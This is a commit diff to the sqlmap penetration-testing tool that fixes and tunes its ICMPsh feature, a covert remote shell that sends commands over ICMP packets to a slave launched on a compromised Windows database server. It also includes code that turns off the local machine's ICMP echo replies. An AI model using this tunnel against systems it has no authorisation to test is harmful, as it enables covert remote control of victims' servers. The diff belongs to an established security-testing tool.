Minor bug fixes and enhancements to ICMPsh tunnel

2025-02-03 05:04:11 +03:00 · 2010-10-27 23:01:17 +00:00 · 2010-10-27 23:01:17 +00:00 · 56c16cb471
commit 56c16cb471
parent 26cf6c2136
3 changed files with 22 additions and 7 deletions
--- a/extra/icmpsh/icmpsh_m.py
+++ b/extra/icmpsh/icmpsh_m.py
@ -85,7 +85,7 @@ def main(src, dst):
                data = icmppacket.get_data_as_string()

                if len(data) > 0:
-                    print data
+                    sys.stdout.write(data)

                # Parse command from standard input
                try:
@ -94,9 +94,7 @@ def main(src, dst):
                    pass

                if cmd == 'exit':
-                    break
-
-                cmd += '\n'
+                    return

                # Set sequence number and identifier
                icmp.set_icmp_id(ident)
@ -116,7 +114,7 @@ def main(src, dst):
                sock.sendto(ip.get_packet(), (dst, 0))

 if __name__ == '__main__':
-    if len(sys.argv) < 2:
+    if len(sys.argv) < 3:
        print 'missing mandatory options. Execute as root:'
        print './icmpsh-m.py <source IP address> <destination IP address>'
        sys.exit(1)
--- a/lib/takeover/icmpsh.py
+++ b/lib/takeover/icmpsh.py
@ -81,7 +81,7 @@ class ICMPsh:
        infoMsg  = "running icmpsh slave remotely"
        logger.info(infoMsg)

-        self.__icmpshSlaveCmd = "%s -t %s" % (self.__icmpslaveRemote, self.lhostStr)
+        self.__icmpshSlaveCmd = "%s -t %s -d 500 -b 30 -s 128" % (self.__icmpslaveRemote, self.lhostStr)

        cmd = "%s &" % self.__icmpshSlaveCmd

--- a/plugins/generic/takeover.py
+++ b/plugins/generic/takeover.py
@ -7,6 +7,8 @@ Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)
 See the file 'doc/COPYING' for copying permission
 """

+import os
+
 from lib.core.common import readInput
 from lib.core.common import runningAsAdmin
 from lib.core.data import conf
@ -109,7 +111,7 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
                warnMsg = "invalid value, valid values are 1 and 2"
                logger.warn(warnMsg)

-        if tunnel == 2 and kb.dbms != "Windows":
+        if tunnel == 2 and kb.os != "Windows":
                errMsg = "icmpsh slave is only supported on Windows at "
                errMsg += "the moment. The back-end database server is "
                errMsg += "not. sqlmap will fallback to TCP (Metasploit)"
@ -136,6 +138,21 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
                errMsg += "http://oss.coresecurity.com/projects/impacket.html"
                raise sqlmapMissingDependence, errMsg

+            sysIgnoreIcmp = "/proc/sys/net/ipv4/icmp_echo_ignore_all"
+
+            if os.path.exists(sysIgnoreIcmp):
+                fp = open(sysIgnoreIcmp, "wb")
+                fp.write("1")
+                fp.close()
+            else:
+                errMsg = "you need to disable ICMP replies by your machine "
+                errMsg += "system-wide. For example run on Linux/Unix:\n"
+                errMsg += "# sysctl -w net.ipv4.icmp_echo_ignore_all=1\n"
+                errMsg += "If you miss doing that, you will receive "
+                errMsg += "information from the database server and it "
+                errMsg += "is unlikely to receive commands send from you"
+                logger.error(errMsg)
+
        if kb.stackedTest or conf.direct:
            web = False